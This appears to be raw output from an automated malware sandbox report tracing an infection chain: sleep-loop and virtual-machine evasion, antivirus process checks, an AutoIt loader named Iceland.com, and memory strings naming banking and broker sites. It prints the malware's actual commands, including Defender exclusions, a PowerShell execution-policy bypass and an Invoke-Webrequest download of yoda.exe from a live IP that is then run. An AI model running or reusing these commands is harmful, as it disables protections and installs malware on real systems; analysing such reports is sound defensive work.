Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6200	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3604	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7122	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2469	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7107	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2523	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3925	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5514	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

API coverage: 3.7 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988	Thread sleep count: 6200 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988	Thread sleep count: 3604 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536	Thread sleep count: 7122 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1248	Thread sleep count: 2469 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688	Thread sleep count: 7107 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep count: 2523 > 30	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 6204	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812	Thread sleep count: 3925 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812	Thread sleep count: 5514 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2972	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6500	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_00406301 FindFirstFileW,FindClose,	11_2_00406301
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	11_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0097DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0097DC54
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0098A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0098A087
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0098A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0098A1E2
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0097E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	21_2_0097E472
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0098A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	21_2_0098A570
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009866DC FindFirstFileW,FindNextFileW,FindClose,	21_2_009866DC
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0094C622 FindFirstFileExW,	21_2_0094C622
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	21_2_009873D4
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00987333 FindFirstFileW,FindClose,	21_2_00987333
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0097D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0097D921

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00915FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

21_2_00915FC8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\314782\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\314782	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: chrome.exe, 00000018.00000002.2727023419.000054DC00B2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: GVS0HV.21.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: chrome.exe, 00000018.00000002.2726269890.000054DC00A7C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: GVS0HV.21.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: GVS0HV.21.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: GVS0HV.21.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: GVS0HV.21.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: GVS0HV.21.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Iceland.com, 00000015.00000002.3334799406.00000000016E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\\\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\.
Source: chrome.exe, 00000018.00000002.2722236138.000054DC00290000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=f0d1436b-97b7-4d75-9a29-400a5be50a4a
Source: Iceland.com, 00000015.00000002.3334799406.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3335011183.0000028917C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3342023991.000002891D457000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msedge.exe, 0000001C.00000003.2774982265.00003D1802580000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: GVS0HV.21.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: GVS0HV.21.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: GVS0HV.21.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: GVS0HV.21.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Iceland.com, 00000015.00000002.3334799406.00000000016C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Iceland.com, 00000015.00000002.3334799406.00000000016E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWFp
Source: GVS0HV.21.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: GVS0HV.21.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: GVS0HV.21.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GVS0HV.21.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: GVS0HV.21.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msedge.exe, 0000001C.00000002.2791643599.00000251FF244000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000020.00000002.2896439229.000002D349C45000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000024.00000002.3048016463.0000021679843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: GVS0HV.21.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GVS0HV.21.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: chrome.exe, 00000018.00000002.2716347860.000001E90E4EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOO
Source: GVS0HV.21.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GVS0HV.21.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: GVS0HV.21.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: GVS0HV.21.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: GVS0HV.21.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: GVS0HV.21.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GVS0HV.21.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: yoda.exe, 0000000B.00000002.2268651449.000000000081C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: GVS0HV.21.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: chrome.exe, 00000018.00000002.2718337424.000001E917A40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_@[
Source: GVS0HV.21.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: GVS0HV.21.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: chrome.exe, 00000018.00000002.2729822608.000054DC00D9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: kmkm3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=f0d1436b-97b7-4d75-9a29-400a5be50a4a
Source: GVS0HV.21.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: GVS0HV.21.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: GVS0HV.21.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: GVS0HV.21.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0098F4FF BlockInput,

21_2_0098F4FF

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0091338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

21_2_0091338B

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

Code function: 11_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

11_2_00406328

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00935058 mov eax, dword ptr fs:[00000030h]

21_2_00935058

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_009720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

21_2_009720AA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00942992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00942992
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00930BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00930BAF
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00930D45 SetUnhandledExceptionFilter,	21_2_00930D45
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00930F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00930F91

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: Iceland.com PID: 2800, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP'"			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force"

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

21_2_00971B4D

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0091338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

21_2_0091338B

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0097BBED SendInput,keybd_event,

21_2_0097BBED

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0097EC9E mouse_event,

21_2_0097EC9E

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\yoda.exe yoda.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_009714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

21_2_009714AE

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00971FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

21_2_00971FB0

Source: Iceland.com, 00000015.00000000.2295377842.00000000009D3000.00000002.00000001.01000000.0000000A.sdmp, Iceland.com.12.dr, Dedicated.11.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Iceland.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00930A08 cpuid

21_2_00930A08

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
